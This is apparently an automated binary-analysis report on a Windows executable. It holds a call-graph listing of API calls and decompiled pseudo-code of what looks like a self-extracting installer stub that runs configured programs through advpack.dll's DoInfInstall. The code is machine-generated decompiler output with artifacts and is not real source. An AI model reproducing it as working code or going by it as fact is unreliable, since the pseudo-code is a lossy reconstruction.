_vsnprintf 2843->2847 2844->2842 2848 bc276d 2845->2848 2849 bc44b9 20 API calls 2846->2849 2850 bc2735 2847->2850 2848->2800 2849->2842 2851 bc44b9 20 API calls 2850->2851 2851->2842 2853 bc468f 7 API calls 2852->2853 2854 bc4ff5 FindResourceA LoadResource LockResource 2853->2854 2855 bc5020 2854->2855 2869 bc515f 2854->2869 2856 bc5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2856 2857 bc5057 2855->2857 2856->2857 2874 bc4efd 2857->2874 2860 bc507c 2864 bc50e8 2860->2864 2871 bc5106 2860->2871 2861 bc5060 2862 bc44b9 20 API calls 2861->2862 2863 bc5075 2862->2863 2863->2871 2865 bc44b9 20 API calls 2864->2865 2865->2863 2866 bc511d 2868 bc5129 2866->2868 2870 bc513a 2866->2870 2867 bc5110 FreeResource 2867->2866 2872 bc44b9 20 API calls 2868->2872 2869->2654 2870->2869 2873 bc514c SendMessageA 2870->2873 2871->2866 2871->2867 2872->2870 2873->2869 2875 bc4f4a 2874->2875 2881 bc4fa1 2875->2881 2882 bc4980 2875->2882 2877 bc6ce0 4 API calls 2878 bc4fc6 2877->2878 2878->2860 2878->2861 2881->2877 2883 bc4990 2882->2883 2884 bc49a5 2883->2884 2885 bc49c2 lstrcmpA 2883->2885 2886 bc44b9 20 API calls 2884->2886 2887 bc4a0e 2885->2887 2888 bc49ba 2885->2888 2886->2888 2887->2888 2893 bc487a 2887->2893 2888->2881 2890 bc4b60 2888->2890 2891 bc4b76 2890->2891 2892 bc4b92 FindCloseChangeNotification 2890->2892 2891->2881 2892->2891 2894 bc48a2 CreateFileA 2893->2894 2896 bc4908 2894->2896 2897 bc48e9 2894->2897 2896->2888 2897->2896 2898 bc48ee 2897->2898 2901 bc490c 2898->2901 2902 bc48f5 CreateFileA 2901->2902 2903 bc4917 2901->2903 2902->2896 2903->2902 2904 bc4962 CharNextA 2903->2904 2905 bc4953 CreateDirectoryA 2903->2905 2904->2903 2905->2904 2907 bc255b 2906->2907 2908 bc2510 2906->2908 2910 bc6ce0 4 API calls 2907->2910 2909 bc658a CharPrevA 2908->2909 2911 bc2522 WritePrivateProfileStringA _lopen 2909->2911 2912 bc2569 2910->2912 2911->2907 2913 bc2548 _llseek _lclose 2911->2913 2912->2664 2913->2907 2915 bc1b25 2914->2915 3018 bc1a84 2915->3018 2917 
bc1b57 2918 bc658a CharPrevA 2917->2918 2920 bc1b8c 2917->2920 2918->2920 2919 bc66c8 2 API calls 2921 bc1bd1 2919->2921 2920->2919 2922 bc1bd9 CompareStringA 2921->2922 2923 bc1d73 2921->2923 2922->2923 2924 bc1bf7 GetFileAttributesA 2922->2924 2925 bc66c8 2 API calls 2923->2925 2926 bc1c0d 2924->2926 2927 bc1d53 2924->2927 2928 bc1d7d 2925->2928 2926->2927 2933 bc1a84 2 API calls 2926->2933 2931 bc44b9 20 API calls 2927->2931 2929 bc1df8 LocalAlloc 2928->2929 2930 bc1d81 CompareStringA 2928->2930 2929->2927 2932 bc1e0b GetFileAttributesA 2929->2932 2930->2929 2937 bc1d9b 2930->2937 2951 bc1cc2 2931->2951 2945 bc1e1d 2932->2945 2952 bc1e45 2932->2952 2934 bc1c31 2933->2934 2935 bc1c50 LocalAlloc 2934->2935 2940 bc1a84 2 API calls 2934->2940 2935->2927 2938 bc1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2935->2938 2936 bc1e89 2939 bc6ce0 4 API calls 2936->2939 2937->2937 2941 bc1dbe LocalAlloc 2937->2941 2947 bc1cf8 2938->2947 2938->2951 2944 bc1ea1 2939->2944 2940->2935 2941->2927 2946 bc1de1 2941->2946 2944->2682 2945->2952 2950 bc171e _vsnprintf 2946->2950 2948 bc1d09 GetShortPathNameA 2947->2948 2949 bc1d23 2947->2949 2948->2949 2953 bc171e _vsnprintf 2949->2953 2950->2951 2951->2936 3024 bc2aac 2952->3024 2953->2951 2955 bc209a 2954->2955 2956 bc2256 2954->2956 2958 bc171e _vsnprintf 2955->2958 2961 bc20dc 2955->2961 2957 bc6ce0 4 API calls 2956->2957 2959 bc2263 2957->2959 2960 bc20af RegQueryValueExA 2958->2960 2959->2682 2960->2955 2960->2961 2962 bc20fb GetSystemDirectoryA 2961->2962 2963 bc20e4 RegCloseKey 2961->2963 2964 bc658a CharPrevA 2962->2964 2963->2956 2965 bc211b LoadLibraryA 2964->2965 2966 bc212e GetProcAddress FreeLibrary 2965->2966 2967 bc2179 GetModuleFileNameA 2965->2967 2966->2967 2968 bc214e GetSystemDirectoryA 2966->2968 2969 bc21de RegCloseKey 2967->2969 2972 bc2177 2967->2972 2970 bc2165 2968->2970 2968->2972 2969->2956 2971 bc658a CharPrevA 2970->2971 2971->2972 2972->2972 2973 bc21b7 LocalAlloc 2972->2973 2974 bc21cd 
2973->2974 2975 bc21ec 2973->2975 2976 bc44b9 20 API calls 2974->2976 2977 bc171e _vsnprintf 2975->2977 2976->2969 2978 bc2218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2956 2981 bc4106 2980->2981 2982 bc4016 CreateProcessA 2980->2982 2985 bc6ce0 4 API calls 2981->2985 2983 bc40c4 2982->2983 2984 bc4041 WaitForSingleObject GetExitCodeProcess 2982->2984 2986 bc6285 GetLastError 2983->2986 2987 bc4070 2984->2987 2988 bc4117 2985->2988 2990 bc40c9 GetLastError FormatMessageA 2986->2990 3051 bc411b 2987->3051 2988->2682 2992 bc44b9 20 API calls 2990->2992 2991 bc4096 CloseHandle CloseHandle 2991->2981 2993 bc40ba 2991->2993 2992->2981 2993->2981 2995 bc64c2 2994->2995 2996 bc658a CharPrevA 2995->2996 2997 bc64d8 GetFileAttributesA 2996->2997 2998 bc64ea 2997->2998 2999 bc6501 LoadLibraryA 2997->2999 2998->2999 3000 bc64ee LoadLibraryExA 2998->3000 3001 bc6508 2999->3001 3000->3001 3002 bc6ce0 4 API calls 3001->3002 3003 bc6513 3002->3003 3003->2702 3005 bc2289 RegOpenKeyExA 3004->3005 3006 bc2381 3004->3006 3005->3006 3007 bc22b1 RegQueryValueExA 3005->3007 3008 bc6ce0 4 API calls 3006->3008 3009 bc2374 RegCloseKey 3007->3009 3010 bc22e6 memset GetSystemDirectoryA 3007->3010 3011 bc238c 3008->3011 3009->3006 3012 bc230f 3010->3012 3013 bc2321 3010->3013 3011->2675 3014 bc658a CharPrevA 3012->3014 3015 bc171e _vsnprintf 3013->3015 3014->3013 3016 bc233f RegSetValueExA 3015->3016 3016->3009 3019 bc1a9a 3018->3019 3021 bc1aba 3019->3021 3023 bc1aaf 3019->3023 3037 bc667f 3019->3037 3021->2917 3022 bc667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 bc2be6 3024->3025 3026 bc2ad4 GetModuleFileNameA 3024->3026 3027 bc6ce0 4 API calls 3025->3027 3035 bc2b02 3026->3035 3029 bc2bf5 3027->3029 3028 bc2af1 IsDBCSLeadByte 3028->3035 3029->2936 3030 bc2bca CharNextA 3032 bc2bd3 CharNextA 3030->3032 3031 bc2b11 CharNextA CharUpperA 3033 bc2b8d CharUpperA 3031->3033 3031->3035 3032->3035 3033->3035 3035->3025 3035->3028 3035->3030 3035->3031 3035->3032 3035->3035 
3036 bc2b43 CharPrevA 3035->3036 3042 bc65e8 3035->3042 3036->3035 3038 bc6689 3037->3038 3039 bc66a5 3038->3039 3040 bc6648 IsDBCSLeadByte 3038->3040 3041 bc6697 CharNextA 3038->3041 3039->3019 3040->3038 3041->3038 3043 bc65f4 3042->3043 3043->3043 3044 bc65fb CharPrevA 3043->3044 3045 bc6611 CharPrevA 3044->3045 3046 bc661e 3045->3046 3047 bc660b 3045->3047 3048 bc663d 3046->3048 3049 bc6634 CharNextA 3046->3049 3050 bc6627 CharPrevA 3046->3050 3047->3045 3047->3046 3048->3035 3049->3048 3050->3048 3050->3049 3052 bc4132 3051->3052 3054 bc412a 3051->3054 3055 bc1ea7 3052->3055 3054->2991 3056 bc1eba 3055->3056 3058 bc1ed3 3055->3058 3057 bc256d 15 API calls 3056->3057 3057->3058 3058->3054 3060 bc2026 3059->3060 3061 bc1ff0 RegOpenKeyExA 3059->3061 3060->2321 3061->3060 3062 bc200f RegDeleteValueA RegCloseKey 3061->3062 3062->3060 3173 bc19e0 3174 bc1a24 GetDesktopWindow 3173->3174 3175 bc1a03 3173->3175 3177 bc43d0 11 API calls 3174->3177 3176 bc1a20 3175->3176 3178 bc1a16 EndDialog 3175->3178 3180 bc6ce0 4 API calls 3176->3180 3179 bc1a33 LoadStringA SetDlgItemTextA MessageBeep 3177->3179 3178->3176 3179->3176 3181 bc1a7e 3180->3181 3182 bc6a20 __getmainargs 3063 bc4cd0 3064 bc4cf4 3063->3064 3065 bc4d0b 3063->3065 3066 bc4d02 3064->3066 3067 bc4b60 FindCloseChangeNotification 3064->3067 3065->3066 3069 bc4dcb 3065->3069 3072 bc4d25 3065->3072 3068 bc6ce0 4 API calls 3066->3068 3067->3066 3070 bc4e95 3068->3070 3071 bc4dd4 SetDlgItemTextA 3069->3071 3073 bc4de3 3069->3073 3071->3073 3072->3066 3086 bc4c37 3072->3086 3073->3066 3091 bc476d 3073->3091 3077 bc4e38 3077->3066 3079 bc4980 25 API calls 3077->3079 3078 bc4b60 FindCloseChangeNotification 3080 bc4d99 SetFileAttributesA 3078->3080 3081 bc4e56 3079->3081 3080->3066 3081->3066 3082 bc4e64 3081->3082 3100 bc47e0 LocalAlloc 3082->3100 3085 bc4e6f 3085->3066 3087 bc4c4c DosDateTimeToFileTime 3086->3087 3088 bc4c88 3086->3088 3087->3088 3089 bc4c5e LocalFileTimeToFileTime 3087->3089 3088->3066 3088->3078 
3089->3088 3090 bc4c70 SetFileTime 3089->3090 3090->3088 3109 bc66ae GetFileAttributesA 3091->3109 3093 bc477b 3093->3077 3094 bc47cc SetFileAttributesA 3096 bc47db 3094->3096 3096->3077 3097 bc6517 24 API calls 3098 bc47b1 3097->3098 3098->3094 3098->3096 3099 bc47c2 3098->3099 3099->3094 3101 bc480f LocalAlloc 3100->3101 3102 bc47f6 3100->3102 3105 bc480b 3101->3105 3106 bc4831 3101->3106 3103 bc44b9 20 API calls 3102->3103 3103->3105 3105->3085 3107 bc44b9 20 API calls 3106->3107 3108 bc4846 LocalFree 3107->3108 3108->3105 3110 bc4777 3109->3110 3110->3093 3110->3094 3110->3097 3111 bc4ad0 3119 bc3680 3111->3119 3114 bc4aee WriteFile 3116 bc4b0f 3114->3116 3117 bc4b14 3114->3117 3115 bc4ae9 3117->3116 3118 bc4b3b SendDlgItemMessageA 3117->3118 3118->3116 3120 bc3691 MsgWaitForMultipleObjects 3119->3120 3121 bc36e8 3120->3121 3122 bc36a9 PeekMessageA 3120->3122 3121->3114 3121->3115 3122->3120 3123 bc36bc 3122->3123 3123->3120 3123->3121 3124 bc36c7 DispatchMessageA 3123->3124 3125 bc36d1 PeekMessageA 3123->3125 3124->3125 3125->3123 3183 bc3210 3184 bc3227 3183->3184 3208 bc328e EndDialog 3183->3208 3185 bc3235 3184->3185 3186 bc33e2 GetDesktopWindow 3184->3186 3190 bc324c 3185->3190 3191 bc32dd GetDlgItemTextA 3185->3191 3215 bc3239 3185->3215 3188 bc43d0 11 API calls 3186->3188 3189 bc33f1 SetWindowTextA SendDlgItemMessageA 3188->3189 3192 bc341f GetDlgItem EnableWindow 3189->3192 3189->3215 3194 bc32c5 EndDialog 3190->3194 3195 bc3251 3190->3195 3193 bc3366 3191->3193 3200 bc32fc 3191->3200 3192->3215 3197 bc44b9 20 API calls 3193->3197 3194->3215 3196 bc325c LoadStringA 3195->3196 3195->3215 3198 bc327b 3196->3198 3199 bc3294 3196->3199 3197->3215 3204 bc44b9 20 API calls 3198->3204 3221 bc4224 LoadLibraryA 3199->3221 3200->3193 3203 bc3331 GetFileAttributesA 3200->3203 3206 bc337c 3203->3206 3207 bc333f 3203->3207 3204->3208 3205 bc32a5 SetDlgItemTextA 3205->3198 3205->3215 3209 bc658a CharPrevA 3206->3209 3210 bc44b9 20 API calls 3207->3210 3208->3215 3211 
bc338d 3209->3211 3212 bc3351 3210->3212 3213 bc58c8 27 API calls 3211->3213 3214 bc335a CreateDirectoryA 3212->3214 3212->3215 3216 bc3394 3213->3216 3214->3193 3214->3206 3216->3193 3217 bc33a4 3216->3217 3218 bc33c7 EndDialog 3217->3218 3219 bc597d 34 API calls 3217->3219 3218->3215 3220 bc33c3 3219->3220 3220->3215 3220->3218 3222 bc4246 GetProcAddress 3221->3222 3223 bc43b2 3221->3223 3224 bc425d GetProcAddress 3222->3224 3225 bc43a4 FreeLibrary 3222->3225 3227 bc44b9 20 API calls 3223->3227 3224->3225 3226 bc4274 GetProcAddress 3224->3226 3225->3223 3226->3225 3228 bc428b 3226->3228 3229 bc329d 3227->3229 3230 bc4295 GetTempPathA 3228->3230 3231 bc42e1 3228->3231 3229->3205 3229->3215 3232 bc42ad 3230->3232 3235 bc4390 FreeLibrary 3231->3235 3232->3232 3233 bc42b4 CharPrevA 3232->3233 3233->3231 3234 bc42d0 CharPrevA 3233->3234 3234->3231 3235->3229 3236 bc4a50 3237 bc4a9f ReadFile 3236->3237 3238 bc4a66 3236->3238 3239 bc4abb 3237->3239 3238->3239 3240 bc4a82 memcpy 3238->3240 3240->3239 3241 bc3450 3242 bc345e 3241->3242 3243 bc34d3 EndDialog 3241->3243 3244 bc349a GetDesktopWindow 3242->3244 3247 bc3465 3242->3247 3245 bc346a 3243->3245 3246 bc43d0 11 API calls 3244->3246 3248 bc34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3246->3248 3247->3245 3249 bc348c EndDialog 3247->3249 3248->3245 3249->3245 3126 bc4cc0 GlobalFree 3127 bc6f40 SetUnhandledExceptionFilter 3250 bc4bc0 3251 bc4bd7 3250->3251 3253 bc4c05 3250->3253 3252 bc4c1b SetFilePointer 3252->3251 3253->3251 3253->3252 3254 bc30c0 3255 bc30de CallWindowProcA 3254->3255 3256 bc30ce 3254->3256 3257 bc30da 3255->3257 3256->3255 3256->3257 3258 bc63c0 3259 bc6407 3258->3259 3260 bc658a CharPrevA 3259->3260 3261 bc6415 CreateFileA 3260->3261 3262 bc6448 WriteFile 3261->3262 3263 bc643a 3261->3263 3264 bc6465 CloseHandle 3262->3264 3266 bc6ce0 4 API calls 3263->3266 3264->3263 3267 bc648f 3266->3267 3268 bc3100 3269 bc31b0 3268->3269 3270 bc3111 3268->3270 3271 bc31b9 SendDlgItemMessageA 
3269->3271 3272 bc3141 3269->3272 3273 bc3149 GetDesktopWindow 3270->3273 3276 bc311d 3270->3276 3271->3272 3275 bc43d0 11 API calls 3273->3275 3274 bc3138 EndDialog 3274->3272 3277 bc315d 6 API calls 3275->3277 3276->3272 3276->3274 3277->3272 3278 bc4200 3279 bc421e 3278->3279 3280 bc420b SendMessageA 3278->3280 3280->3279 3281 bc6c03 3282 bc6c1e 3281->3282 3283 bc6c17 _exit 3281->3283 3284 bc6c27 _cexit 3282->3284 3285 bc6c32 3282->3285 3283->3282 3284->3285

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00BC3BA2() {
                                                                                                                                                                                                        				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xbc9124 =  *0xbc9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xbc8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xbc8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00BC468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xbc9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00BC1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00BC6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00BC3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xbc8580;
													if( *0xbc8580 != 0) {
														E00BC2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
                                                                                                                                                                                                        											__eflags =  *0xbc8180;
                                                                                                                                                                                                        											if( *0xbc8180 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c7;
                                                                                                                                                                                                        												E00BC44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                        												LocalFree(_v424);
                                                                                                                                                                                                        												 *0xbc9124 = 0x8007042b;
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xbc9a34 & 0x00000004;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t129 = E00BC6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                        											__eflags = _t129;
                                                                                                                                                                                                        											if(_t129 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c8;
                                                                                                                                                                                                        												E00BC44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                        												L65:
                                                                                                                                                                                                        												LocalFree(_v408);
                                                                                                                                                                                                        												 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                        											_v404 = _t146;
                                                                                                                                                                                                        											__eflags = _t146;
                                                                                                                                                                                                        											if(_t146 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c9;
                                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                                        												E00BC44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                        												FreeLibrary(_t129);
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xbc8a30;
                                                                                                                                                                                                        											_t151 = _v408;
                                                                                                                                                                                                        											_v384 = 0;
                                                                                                                                                                                                        											_v368 =  &_v280;
                                                                                                                                                                                                        											_t96 =  *0xbc9a40; // 0x3
                                                                                                                                                                                                        											_v364 = _t96;
                                                                                                                                                                                                        											_t97 =  *0xbc8a38 & 0x0000ffff;
                                                                                                                                                                                                        											_v380 = 0xbc9154;
                                                                                                                                                                                                        											_v376 = _t151;
                                                                                                                                                                                                        											_v372 = 0xbc91e4;
                                                                                                                                                                                                        											_v360 = _t97;
                                                                                                                                                                                                        											if( *0xbc8a30 != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t144 =  *0xbc9a34; // 0x1
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t145 =  *0xbc8d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0xbc9a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0xbca288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
                                                                                                                                                                                                        												asm("int 0x29");
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											 *0xbc9124 = _t101;
                                                                                                                                                                                                        											_push(_t129);
                                                                                                                                                                                                        											__eflags = _t101;
                                                                                                                                                                                                        											if(_t101 < 0) {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												goto L61;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												_t127 = _v400;
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xbc9a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xbc8a20;
                                                                                                                                                                                                        										if( *0xbc8a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E00BC202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E00BC468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xbc8c42;
                                                                                                                                                                                                        									if( *0xbc8c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0xbc8a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00BC468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00BC468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E00BC1781( &_v276, 0x104, _t130, 0xbc8c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E00BC468F(_t130, 0xbc9a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x00bc3fb9
                                                                                                                                                                                                        0x00bc3fc2
                                                                                                                                                                                                        0x00bc3fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3fc8
                                                                                                                                                                                                        0x00bc3dfb
                                                                                                                                                                                                        0x00bc3dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3e03
                                                                                                                                                                                                        0x00bc3e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3e15
                                                                                                                                                                                                        0x00bc3e17
                                                                                                                                                                                                        0x00bc3e19
                                                                                                                                                                                                        0x00bc3f94
                                                                                                                                                                                                        0x00bc3fa4
                                                                                                                                                                                                        0x00bc3f7c
                                                                                                                                                                                                        0x00bc3f80
                                                                                                                                                                                                        0x00bc3f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3f8b
                                                                                                                                                                                                        0x00bc3e2c
                                                                                                                                                                                                        0x00bc3e30
                                                                                                                                                                                                        0x00bc3e34
                                                                                                                                                                                                        0x00bc3e36
                                                                                                                                                                                                        0x00bc3f69
                                                                                                                                                                                                        0x00bc3f6e
                                                                                                                                                                                                        0x00bc3f70
                                                                                                                                                                                                        0x00bc3f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3f76
                                                                                                                                                                                                        0x00bc3e3c
                                                                                                                                                                                                        0x00bc3e43
                                                                                                                                                                                                        0x00bc3e47
                                                                                                                                                                                                        0x00bc3e52
                                                                                                                                                                                                        0x00bc3e56
                                                                                                                                                                                                        0x00bc3e5c
                                                                                                                                                                                                        0x00bc3e61
                                                                                                                                                                                                        0x00bc3e68
